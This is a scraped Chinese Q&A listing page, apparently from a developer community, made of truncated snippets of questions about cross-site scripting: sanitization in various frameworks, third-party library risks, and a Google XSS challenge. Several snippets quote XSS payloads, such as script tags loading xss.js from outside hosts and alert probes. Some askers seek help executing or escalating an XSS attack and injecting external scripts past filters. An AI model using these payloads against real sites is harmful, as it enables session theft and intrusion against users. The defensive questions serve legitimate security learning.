1回答
我一直在通过gwt (V2.4.0)演示一个示例xss攻击,.I创建了一个带有html文本区域和提交按钮的表单(GET方法),在提交时它通过gwt rpc调用服务器,如果存在xss漏洞,示例测试用例//<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> //不应该是filtered.But --这不起作用,请分享如何执行xss攻击?
浏览 2提问于2012-07-21得票数 1
php "<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>",
"javascript:/*--></title><"<SCRIPT/XSS SRC=\"http://xss.rocks/xss.<em
浏览 7提问于2022-05-01得票数 1
回答已采纳
我在一个android移动应用中使用了各种各样的第三方库,比如cordova.js,jquery,jquery mobile,mobilizer等等。通过不安全地使用eval、settimeout、inner/outerhtml等,可以发现这些库具有各种XSS向量。但是,存在这些问题的模块不会在应用程序中使用/调用。考虑到上面的场景,有没有办法让攻击者可以基于第三方库中的XSS向量来攻击我的应用程序,即使我的应用程序中没有使用有漏洞的模块?这个问题是关于我之前的:“如何针对第三方js库
浏览 2提问于2013-03-12得票数 0
1回答
我所做的: <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script src="libs/
浏览 1提问于2012-11-16得票数 4
回答已采纳
与这个相关的是,我在我的ASP.NET MVC项目中处理了XSS问题,并且我对MvcHtmlSTring.ToHtmlString()方法感到困惑。从“返回一个表示当前对象的HTML编码的字符串”,但它在我的例子中不起作用:
浏览 0提问于2012-03-21得票数 8
回答已采纳
at remove_invisible_characters (C:\Users\Jack\Desktop\Dropbox\Nimble\node_mo title: sanitize(data.title).xss(), //string
deadline:sanitize(data.deadline).xss(),
浏览 0提问于2012-01-23得票数 0
回答已采纳
我有在客户端使用angular js的应用程序,并使ajax调用用have编写的rest web服务。我想应用xss检查。有人可以建议它应该应用在angular js还是rest web服务端吗?
浏览 0提问于2017-10-31得票数 0
1回答
对于XSS攻击的vue.js漏洞,我有点困惑。我尝试了几种解决方案:
清理服务器端的输入但问题是,vue.js显示的输入编码(所以我需要使用v-html)完全没有消毒功能,因为在呈现输出时,Vue.js会自动清除输入。在这两种情况下,我都进行了测试:alert('XSS') <script>alert('XSS')</script> {{ alert('XSS') }} {{c
浏览 28提问于2022-08-10得票数 2
1回答
我的应用程序包含一个安全漏洞(XSS跨站点脚本)。如何确保我的应用程序安全?我是否设置了js框架来保护它?是什么类型的XSS漏洞?是如何引入的,上下文是什么?你在使用什么支柱1
XSS由HTML代码执行,该代码由第三方引入并由应用程序执行。在下面的示例中,要调用添加了postscript警报(1)。它是在申请方制作的。
浏览 0提问于2016-02-22得票数 0
回答已采纳
1回答
我有一个问题加载外部页面到我的div使用Javascript。我在控制台中得到了一个NS_ERROR_FAILURE。 req.open("GET", 'helpInfo.html', false); var page = req.responseText;
浏览 0提问于2013-01-22得票数 0
1回答
我正在使用Node.js和Underscore.js。我无法确定是在服务器端还是客户端转义JSON数据。'&') .replace(/>/g, '>')};
var xssif (obj instanceof Ar
浏览 3提问于2012-07-01得票数 4
回答已采纳
1回答
主html页面如下所示:<head> <script</html>
在main.js脚本中,我从mydomain加载了另一个脚本。我是通过添加脚本标签来实现的(脚本..src="http://mydomain/api/
浏览 4提问于2010-08-13得票数 0
回答已采纳
我试图为Burpsuite安装XSS Validator,我需要使用phantomjs,但是我无法打开xss.js文件。遗憾的是,我几乎没有代码知识。我试着遵循其他教程,但仍然能弄明白。我是应该将xss.js文件拖到phantomjs命令行中,还是复制它的目录并输入?
浏览 2提问于2016-09-07得票数 0
我正在学习XSS。/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0" id="xss"><script type="text/ecmascript" xlink:href="
浏览 3提问于2013-06-22得票数 0
我正在测试一个没有XSS的网站。因此,我认为将XSS升级为一个有效的bug是个好主意。我需要向我的服务器发出请求,但问题是关闭标记>或正斜杠,/被转义,但其他一切都正常。事件处理程序也可以工作。有没有办法从这些事件处理程序外部调用javascript文件,以便我可以执行脚本?
实际上,我想注入第三部分js文件,没有脚本标记或任何关闭标记。
浏览 0提问于2022-08-17得票数 0
回答已采纳
我在安卓移动应用程序中使用各种第三方库,如cordova.js、jquery、jquery移动、移动工具等等。通过不安全地使用eval、settimeout、insecure /outerhtml等,发现这些库具有各种XSS向量。但是,在应用程序中没有使用/调用具有这些问题的模块。考虑到上述情况,攻击者是否可以利用第三方库中的XSS向量攻击我的应用程序,即使我的应用程序中没有使用易受攻击的模块?
浏览 0提问于2013-03-12得票数 1
如何使用此语法加载外部.js脚本?:<script src=//ha.ckers.org/xss.js<
浏览 0提问于2013-07-04得票数 0
回答已采纳
我目前正在审查一个ASP应用程序,在该应用程序中,javascript初始化在所有地方都使用:这个模式实际上是一些StackOverflow 帖子推荐的东西。现在,既然这是在javascript标记中传递的,我想知道如果get_some_value()不受信任,会有什么问题呢?
免责声明:我不太熟悉ASP。
浏览 0提问于2022-10-21得票数 2
回答已采纳
我使用Express.js和Jade,希望创建一个由文本区域和两个按钮组成的表单,每个按钮调用一个不同的操作。
浏览 2提问于2014-01-06得票数 0
回答已采纳
4回答
以下是来自Google的XSS挑战-第4级的代码:<html> <!-- Internal game scripts/styles, mostly boring stuff -->
<script src="/static/game-frame.js"></script此活动的目的是通过发送一个可以绕过Django的XSS安全性的有效负载来警告消息。
浏览 0提问于2014-06-09得票数 3
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频活动推荐
腾讯云开发者
